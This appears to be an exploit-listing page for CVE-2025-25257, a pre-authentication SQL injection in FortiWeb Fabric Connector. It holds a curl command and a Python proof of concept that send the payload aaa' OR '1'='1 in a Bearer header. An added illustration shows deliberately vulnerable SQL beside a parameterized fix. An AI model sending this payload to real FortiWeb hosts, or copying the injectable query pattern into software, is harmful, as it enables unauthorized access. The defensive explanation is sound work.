📄 FortiWeb Fabric Connector 7.6.x SQL Injection

06 Oct 2025 00:00:00 | Reported by Milad Karimi | Type: packetstorm | Source: packetstorm.news

Pre-authentication SQL injection in FortiWeb Fabric Connector 7.0–7.6.x can enable remote code execution.

Code
# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL Injection to Remote Code Execution
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2025-25257

Overview

CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in
Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.
This flaw allows attackers to inject malicious SQL commands into the
vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).

PoC

curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
  https://<fortiweb-ip>/api/fabric/device/status

PoC Python

import requests

def test_sqli(base_url):
    url = f"{base_url}/api/fabric/device/status"
    headers = {
        "Authorization": "Bearer aaa' OR '1'='1"
    }
    try:
        response = requests.get(url, headers=headers, verify=False, timeout=10)
        print(f"Status code: {response.status_code}")
        print("Response body:")
        print(response.text)
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL CVE-2025-25257 FortiWeb")
    parser.add_argument("base_url", help="Base URL of FortiWeb (ex: https://10.0.0.5)")
    args = parser.parse_args()
    test_sqli(args.base_url)
# python3 src/poc.py https://10.0.0.5
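The following is an added illustration, not the author's PoC and not FortiWeb's code (the page does not show the vulnerable code path). It reconstructs the bug class the advisory describes against a hypothetical in-memory sqlite token table: a bearer token pasted into SQL text, beside the parameterized lookup that closes the hole and a strict token-format check that rejects a header like the one in the PoC before it ever reaches the database. The table name, column names, sample token and token character set are all assumptions made for this example.

```python
import re
import sqlite3


def make_db():
    """Constructed sample: a hypothetical API token table, not FortiWeb's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE fabric_user (id INTEGER PRIMARY KEY, name TEXT, token TEXT)"
    )
    conn.execute("INSERT INTO fabric_user VALUES (1, 'admin', 'real-secret-token')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, bearer):
    """Defective pattern: the token is interpolated into the SQL string, so a
    value such as  aaa' OR '1'='1  rewrites the WHERE clause and matches the
    first row regardless of the real token (pre-authentication bypass)."""
    sql = f"SELECT name FROM fabric_user WHERE token = '{bearer}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(conn, bearer):
    """Fix: the token is bound as a parameter, so it is only ever compared as
    data; quotes and SQL keywords inside it cannot change the query."""
    row = conn.execute(
        "SELECT name FROM fabric_user WHERE token = ?", (bearer,)
    ).fetchone()
    return row[0] if row else None


# Assumption: opaque API tokens use a base64url-like alphabet and a bounded
# length. Anything else (spaces, quotes, comment markers) is rejected up front.
TOKEN_RE = re.compile(r"^[A-Za-z0-9._~+/=-]{16,512}$")


def parse_bearer(header):
    """Defence in depth: validate the Authorization header's shape before the
    value is used anywhere. Returns the token or None if the header is malformed."""
    if header is None or not header.startswith("Bearer "):
        return None
    token = header[len("Bearer "):]
    return token if TOKEN_RE.fullmatch(token) else None


if __name__ == "__main__":
    conn = make_db()
    payload = "aaa' OR '1'='1"  # the injection string from the advisory's PoC
    print("vulnerable lookup:", lookup_vulnerable(conn, payload))  # admin (bypass)
    print("hardened lookup:  ", lookup_hardened(conn, payload))    # None
    print("header check:     ", parse_bearer("Bearer " + payload))  # None (rejected)
```

Parameter binding is the actual fix; the format check is a cheap second layer and also gives a clean detection signal, since any request whose bearer token fails it is worth logging as suspicious.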


06 Oct 2025 00:00 (current)
Vulners AI Score: 9.9 (High risk)
CVSS 3.1: 9.8
EPSS: 0.26204